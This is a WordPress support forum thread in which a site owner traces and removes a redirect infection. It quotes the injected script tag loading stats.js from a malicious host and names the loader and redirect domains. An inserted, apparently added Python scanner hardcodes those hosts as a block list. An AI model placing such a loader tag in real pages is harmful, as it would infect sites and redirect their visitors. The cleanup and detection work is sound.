• Resolved Prolet

    (@prolet)


    Hello all!

    Before everything I’d like to say that I will probably use terms which are not right and my questions will be not so sophisticated, but I am stuck in a situation.

    Therefore, please excuse my poor explanation!

    I have 4 websites and all of them were hacked. My sites were automatically redirecting to another URL – a page asking for permission to carry on, to press buttons – allow or not … etc.

    The hack came from membership plugin ultimatemembership. It turns out I am not the only one who has problems.

    All files with ‘head’ and ‘query’ in their names are compromised. I’ve managed to clean 3 websites and now I am stuck with the 4th.

    I removed the link and now my website loads properly like there is no problem.

    And here is the problem.

    Sucuri check says I am still hacked – https://sitecheck.sucuri.net/results/pumpkinads.co.uk

    With AwSnap I see where the hack is (is that the right word?) – https://aw-snap.info/file-viewer/?protocol=secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=cHVtcGtbbnwjcy5eXS51aw%3D%3D~enc

    On line 598 is the URL of the baddies – https://pr.uustoughtonma.org

    Probably the savvy ones will find more in the file; I am looking only for the obvious … without even knowing if it is proper to post the whole file as I did …

    There is another info too – https://isithacked.com/check/pumpkinads.co.uk

    I did change the WP files, I did follow all recommendations, but I can’t stay calm any more, because I actually don’t know which file this is. The file from AwSnap? Where to find it, please?

    As obvious as it looks, I have no idea how https://pumpkinads.co.uk will give me all this <!DOCTYPE html> info.

    Can you advise, please?

    Thank you so much!


Viewing 8 replies - 1 through 8 (of 8 total)
  • This is an infection indeed.

    We cannot provide you concrete details on where to cure the infection, as it requires an internal (server side) investigation of the website/WordPress.

    The injected JavaScript first goes to https[://]pr[.]uustoughtonma[.]org/d.js, which downloads https[://]stat[.]uustoughtonma[.]org/stats[.]js?f=pr, which finally loads cookie based redirection malware (firing every 8 hours) redirecting to

    http[://]konado[.]space/?h=475053016_949e154f16a_100&h_l=&h_5=sub_id_2&h_2=def_sub

    You have to perform a full internal website audit to locate and remove the malicious code injecting this malware.

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Further to Quttera’s advice, get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter Prolet

    (@prolet)

    Dear Quttera and Andrew Nevins,

    Thank you for your support!

    Andrew, these two links are my constant helpers. I am reading all the time. And this is how I cleaned my 3 other websites!

    On this one I can’t! Wordfence is 100 % sure there is nothing to worry about (Thank you for that! How to rely on this plugin at all?) while Sucuri is panicking me all the time.

    I just found out (to my embarrassment) that if I use the code editor on the server I will have the Doctype files… I used the text editor only.

    And yet, I have no idea how to locate the file which gives the full content of the URL.

    Quttera, I will do a full audit as you suggested!

    Thread Starter Prolet

    (@prolet)

    Problem solved.

    Thread Starter Prolet

    (@prolet)

    Solved

    How did you solve this problem? I have the same problem, thank you

    Thread Starter Prolet

    (@prolet)

    Dear nirolee,

    It was a long and chaotic process. I will share with you everything I did but not in the step-by-step order.

    Apparently the problem was because of plugin ultimate membership. I deleted it and no change.

    It turns out that all my 4 websites were affected plus another one which is on an Ubuntu server. All of them had the same problem.

    – I deleted ultimate membership files. I even deleted everything related to it in the database.
    – I deleted all WP files and folders (except wp-content, wp-config and .htaccess) and uploaded all new WP files.
    – I scanned all with Wordfence and repaired all files as suggested.
    – I deleted this <script type='text/javascript' src='https://stat.uustoughtonma.org/stats.js?f=4'> which was between <header> and </header> in the header.html file in EVERY THEME you have!
    – I deleted a similar script text AFTER the </header> tag in the same files.

    Eventually I was able to load the websites without the nasty redirection but when I was logged in I had the same problem.

    Every time I open a dashboard I will have the redirection again.

    It turns out that at the end of every page there was the same script too. I deleted it all, page by page.

    Also in .htaccess I found this:

    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>

    Every article I read about it suggests that this is a bad hack. Only one article suggested that it is a security code, either from the server or from a security plugin.

    My hosting company said they have no idea what this is and I deleted it. It didn’t harm any of the websites but probably helped the whole process of getting rid of the hack.

    After all of that I can load the websites and work in the background without visible problems.

    I hope this will help you!

    Good luck!
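The manual, file-by-file hunt described in this post (and the loader chain Quttera describes earlier) can be turned into a repeatable check. The script below is an added example, not code from the thread or from WordPress; it walks a theme/plugin tree, reports every external `<script src=...>` tag, and marks the hosts named in this thread as known-bad while flagging any other third-party host for review. The directory path and the sample header file are assumptions constructed for the demonstration.

```python
import re
from pathlib import Path

# Hosts named in this thread's posts (loader, stats script, redirect target).
BAD_HOSTS = {"pr.uustoughtonma.org", "stat.uustoughtonma.org", "konado.space"}

# Match <script ... src='...'>, tolerating the curly quotes WordPress editors insert.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"\u2018\u2019]?([^'\"\u2018\u2019\s>]+)",
    re.IGNORECASE,
)
EXTERNAL = re.compile(r"(?:https?:)?//([^/?#]+)", re.IGNORECASE)

def find_injected_scripts(text, bad_hosts=BAD_HOSTS):
    """Return (line_no, src, host, verdict) for each external script tag.

    Relative sources (theme/core files on the same site) are skipped; hosts in
    bad_hosts get KNOWN-BAD, any other third-party host gets REVIEW.
    """
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for src in SCRIPT_SRC.findall(line):
            m = EXTERNAL.match(src)
            if not m:
                continue
            host = m.group(1).lower()
            verdict = "KNOWN-BAD" if host in bad_hosts else "REVIEW"
            hits.append((no, src, host, verdict))
    return hits

def scan_tree(root, suffixes=(".php", ".html", ".js")):
    """Scan every theme/plugin file under root; return {path: hits} for files with hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injected_scripts(path.read_text(errors="ignore"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed sample of an injected header.php: one known-bad tag, one
# same-site core script (ignored) and one unrelated CDN script (flagged for review).
SAMPLE_HEADER = """<!DOCTYPE html>
<html>
<head>
<script type='text/javascript' src='https://stat.uustoughtonma.org/stats.js?f=4'></script>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://cdn.example.com/lib.js"></script>
</head>
</html>
"""

if __name__ == "__main__":
    for no, src, host, verdict in find_injected_scripts(SAMPLE_HEADER):
        print(f"line {no}: {verdict} {host} <- {src}")
    # Real use: print(scan_tree("/var/www/html/wp-content"))  # assumed WordPress path
```

Run it against `wp-content` after a cleanup (and again after logging in, since this post shows the script also lived at the end of every page) to confirm nothing still references the loader hosts.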

    Thread Starter Prolet

    (@prolet)

    I forgot to tell you that you must change all wp core themes. Especially take care of 2017.

  • The topic ‘Locating file on hacked website’ is closed to new replies.